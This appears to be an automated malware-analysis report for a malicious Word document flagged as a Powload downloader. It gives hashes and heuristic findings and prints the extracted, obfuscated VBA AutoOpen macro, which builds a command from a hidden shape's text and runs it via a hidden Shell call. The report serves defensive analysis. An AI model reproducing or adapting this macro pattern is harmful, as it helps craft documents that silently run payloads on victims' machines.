Office (OLE) malware analysis — malicious · 056dc881e434af5f

MALICIOUS

Office (OLE)

82.8 KB Created: 2018-11-21 13:11:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 43ac97e7f83ee41561f9f18828007078 SHA-1: 199d46a2aee59dd05db9cb666507b277fddad85d SHA-256: 056dc881e434af5fb3bfabd4eebbf630e4c8a8e166467fa310a78bc8745b6209

202 Risk Score

Heuristics 6

ClamAV: Doc.Downloader.Powload-6769663-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6769663-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4383 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4383 bytes
SHA-256: `2c649dd65637564e618b7e4b745ce711f928bcad16a7a70097df86859cb2dcd9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "BjKczdkSBL" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next If fJTonDo Xor VRvZRmoj Then risuZdJ = jtCjd End If If wwVLZpR Xor KZpwcDJ Then WklzLIMj = Sgn(jKjEK) End If GsuzbvbO = (HPYSEcBFv - CDbl(336433771) / RuiLnlp + Sgn(34030430)) - 301209091 + CInt(iXAniEh) - 24534967 * Fix(225228903 * Oct(vWurwktb)) Set iEnFnVL = jMqGWV On Error Resume Next If isMFmj Xor sXpARD Then IoCOB = wVwFhJu End If If bPjDlzV Xor JaSLlWtj Then ZSFENR = Sgn(TCRNwG) End If cmjRIGw = (EoTibwpp - CDbl(186177256) / MtHqoZN + Sgn(325733163)) - 118483862 + CInt(jhIrCCpZ) - 32203787 * Fix(33344031 * Oct(cPtNQkip)) Set dMpkjNQ = zGDKoMwX Set rYfVYTB = Shapes("ZIVVFHRwMZpCBj") On Error Resume Next If liYLN Xor jVKVbBuTU Then rdHYEX = XAsLNi End If If sqfuvnfz Xor HUpsF Then KfsHJS = Sgn(lVCOLAL) End If nVrcclV = (XhfrcADOf - CDbl(89614004) / qMTGV + Sgn(102205249)) - 151662132 + CInt(Jshbi) - 268777030 * Fix(206129052 * Oct(zwPdho)) Set UZdatkSn = zwUITPWN zpsRikk = "" + EQQjWBj + GpFAC + rodUrFw + TWAjbBY + rYfVYTB.TextFrame.TextRange.Text + SNZTcU + afUdYwE + YbMUAqb + afUoOLV On Error Resume Next If dAbujR Xor FvurKUzi Then FwDpzhE = jtLzjds End If If HLPhnO Xor FlkjiPQ Then Qborv = Sgn(pSvwELqFl) End If RCYCIhA = (qYwDPBVG - CDbl(124100111) / vWumzTSt + Sgn(130906140)) - 245119460 + CInt(DhzAOOjq) - 92116639 * Fix(341948050 * Oct(azAWAlCu)) Set wsFKPaf = FkONP On Error Resume Next If rmOjPj Xor UCbMpjAd Then EEXfif = DrRHdj End If If Hpbaq Xor nXfpVB Then hhIHRj = Sgn(FdISoLRLp) End If YBnBTWNIJ = (ZjYiKd - CDbl(111866459) / VjJqzivd + Sgn(217484344)) - 55732193 + CInt(izciiRTO) - 87819925 * Fix(85922656 * Oct(uzITYZ)) Set aILud = FoiEEFqpF rwDAmpPE = Interaction.Shell("" + ZKkLbpln + vvmaS + ldlVLsN + iCHli + zpsRikk + wTfsim + oEWbPJ, vbHide) On Error Resume Next If jEhRjr Xor AdbGRoRul Then iJzSsDzf = rMCnsi End If If GMnjSdM Xor joUnRwj Then aWZzjw = Sgn(AjlUAjwq) End If cohFGCVE = (ZjDjKOPKz - CDbl(182941581) / TjtKXn + Sgn(339889773)) - 221779233 + CInt(Lrkwl) - 73922765 * Fix(192434588 * Oct(aIYAUA)) Set MlRYW = qlWZP On Error Resume Next If DHRAFM Xor fBmJij Then fXiAMBwM = jjjWNdUi End If If aCiIbP Xor rGYKhwDv Then EwXiKiVr = Sgn(iRYpDB) End If HwEdEWvS = (UuZBFk - CDbl(209806006) / qJiwvAvh + Sgn(284725128)) - 261091726 + CInt(wKCDWcaAw) - 119976599 * Fix(181664453 * Oct(CFSpkvpP)) Set loztXlLwJ = NjCTFSqDY On Error Resume Next If vEmocBw Xor NJEnM Then OauYiuC = QHlRSHdN End If If zjYqdqb Xor WPUPjYjq Then fTXbsPbOo = Sgn(CKirdzk) End If Eolkk = (pMfiRj - CDbl(227835387) / abcKp + Sgn(326346079)) - 40667946 + CInt(zboLZX) - 265342320 * Fix(156746638 * Oct(PwScCFuiE)) Set jjswHwzk = PTKnz On Error Resume Next If aTrNObru Xor DzUZRNBuw Then vcpBowFP = kDzQkT End If If JXdDjo Xor bOoSBhw Then CRYZLk = Sgn(DQIMXK) End If GhjGADdQt = (HENnz - CDbl(203656518) / iXZAj + Sgn(292750065)) - 71562211 + CInt(frUNu) - 131781294 * Fix(112801057 * Oct(jHHivj)) Set hlXUSHXiD = EiAlraoZ On Error Resume Next If AmfOJRi Xor zUzWwlMbi Then asRHEk = iIbwa End If If fjtqZQkA Xor pScfwCkiA Then wazjI = Sgn(iuGbJCrYo) End If mCumKw = (jCwfYn - CDbl(38620001) / ZbqbFfAkz + Sgn(283780060)) - 140828772 + CInt(ZknbDri) - 102014267 * Fix(220129284 * Oct(NzAKThKO)) Set HAcjb = zjmmS On Error Resume Next If GzTIQ Xor Kavwbc Then ... (truncated)

SHA-256: 2c649dd65637564e618b7e4b745ce711f928bcad16a7a70097df86859cb2dcd9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "BjKczdkSBL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      If fJTonDo Xor VRvZRmoj Then
         risuZdJ = jtCjd
      End If
      If wwVLZpR Xor KZpwcDJ Then
         WklzLIMj = Sgn(jKjEK)
      End If
   GsuzbvbO = (HPYSEcBFv - CDbl(336433771) / RuiLnlp + Sgn(34030430)) - 301209091 + CInt(iXAniEh) - 24534967 * Fix(225228903 * Oct(vWurwktb))
Set iEnFnVL = jMqGWV
   On Error Resume Next
      If isMFmj Xor sXpARD Then
         IoCOB = wVwFhJu
      End If
      If bPjDlzV Xor JaSLlWtj Then
         ZSFENR = Sgn(TCRNwG)
      End If
   cmjRIGw = (EoTibwpp - CDbl(186177256) / MtHqoZN + Sgn(325733163)) - 118483862 + CInt(jhIrCCpZ) - 32203787 * Fix(33344031 * Oct(cPtNQkip))
Set dMpkjNQ = zGDKoMwX
Set rYfVYTB = Shapes("ZIVVFHRwMZpCBj")
   On Error Resume Next
      If liYLN Xor jVKVbBuTU Then
         rdHYEX = XAsLNi
      End If
      If sqfuvnfz Xor HUpsF Then
         KfsHJS = Sgn(lVCOLAL)
      End If
   nVrcclV = (XhfrcADOf - CDbl(89614004) / qMTGV + Sgn(102205249)) - 151662132 + CInt(Jshbi) - 268777030 * Fix(206129052 * Oct(zwPdho))
Set UZdatkSn = zwUITPWN
zpsRikk = "" + EQQjWBj + GpFAC + rodUrFw + TWAjbBY + rYfVYTB.TextFrame.TextRange.Text + SNZTcU + afUdYwE + YbMUAqb + afUoOLV
   On Error Resume Next
      If dAbujR Xor FvurKUzi Then
         FwDpzhE = jtLzjds
      End If
      If HLPhnO Xor FlkjiPQ Then
         Qborv = Sgn(pSvwELqFl)
      End If
   RCYCIhA = (qYwDPBVG - CDbl(124100111) / vWumzTSt + Sgn(130906140)) - 245119460 + CInt(DhzAOOjq) - 92116639 * Fix(341948050 * Oct(azAWAlCu))
Set wsFKPaf = FkONP
   On Error Resume Next
      If rmOjPj Xor UCbMpjAd Then
         EEXfif = DrRHdj
      End If
      If Hpbaq Xor nXfpVB Then
         hhIHRj = Sgn(FdISoLRLp)
      End If
   YBnBTWNIJ = (ZjYiKd - CDbl(111866459) / VjJqzivd + Sgn(217484344)) - 55732193 + CInt(izciiRTO) - 87819925 * Fix(85922656 * Oct(uzITYZ))
Set aILud = FoiEEFqpF
rwDAmpPE = Interaction.Shell("" + ZKkLbpln + vvmaS + ldlVLsN + iCHli + zpsRikk + wTfsim + oEWbPJ, vbHide)
   On Error Resume Next
      If jEhRjr Xor AdbGRoRul Then
         iJzSsDzf = rMCnsi
      End If
      If GMnjSdM Xor joUnRwj Then
         aWZzjw = Sgn(AjlUAjwq)
      End If
   cohFGCVE = (ZjDjKOPKz - CDbl(182941581) / TjtKXn + Sgn(339889773)) - 221779233 + CInt(Lrkwl) - 73922765 * Fix(192434588 * Oct(aIYAUA))
Set MlRYW = qlWZP
   On Error Resume Next
      If DHRAFM Xor fBmJij Then
         fXiAMBwM = jjjWNdUi
      End If
      If aCiIbP Xor rGYKhwDv Then
         EwXiKiVr = Sgn(iRYpDB)
      End If
   HwEdEWvS = (UuZBFk - CDbl(209806006) / qJiwvAvh + Sgn(284725128)) - 261091726 + CInt(wKCDWcaAw) - 119976599 * Fix(181664453 * Oct(CFSpkvpP))
Set loztXlLwJ = NjCTFSqDY
   On Error Resume Next
      If vEmocBw Xor NJEnM Then
         OauYiuC = QHlRSHdN
      End If
      If zjYqdqb Xor WPUPjYjq Then
         fTXbsPbOo = Sgn(CKirdzk)
      End If
   Eolkk = (pMfiRj - CDbl(227835387) / abcKp + Sgn(326346079)) - 40667946 + CInt(zboLZX) - 265342320 * Fix(156746638 * Oct(PwScCFuiE))
Set jjswHwzk = PTKnz
   On Error Resume Next
      If aTrNObru Xor DzUZRNBuw Then
         vcpBowFP = kDzQkT
      End If
      If JXdDjo Xor bOoSBhw Then
         CRYZLk = Sgn(DQIMXK)
      End If
   GhjGADdQt = (HENnz - CDbl(203656518) / iXZAj + Sgn(292750065)) - 71562211 + CInt(frUNu) - 131781294 * Fix(112801057 * Oct(jHHivj))
Set hlXUSHXiD = EiAlraoZ
   On Error Resume Next
      If AmfOJRi Xor zUzWwlMbi Then
         asRHEk = iIbwa
      End If
      If fjtqZQkA Xor pScfwCkiA Then
         wazjI = Sgn(iuGbJCrYo)
      End If
   mCumKw = (jCwfYn - CDbl(38620001) / ZbqbFfAkz + Sgn(283780060)) - 140828772 + CInt(ZknbDri) - 102014267 * Fix(220129284 * Oct(NzAKThKO))
Set HAcjb = zjmmS
   On Error Resume Next
      If GzTIQ Xor Kavwbc Then
        
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.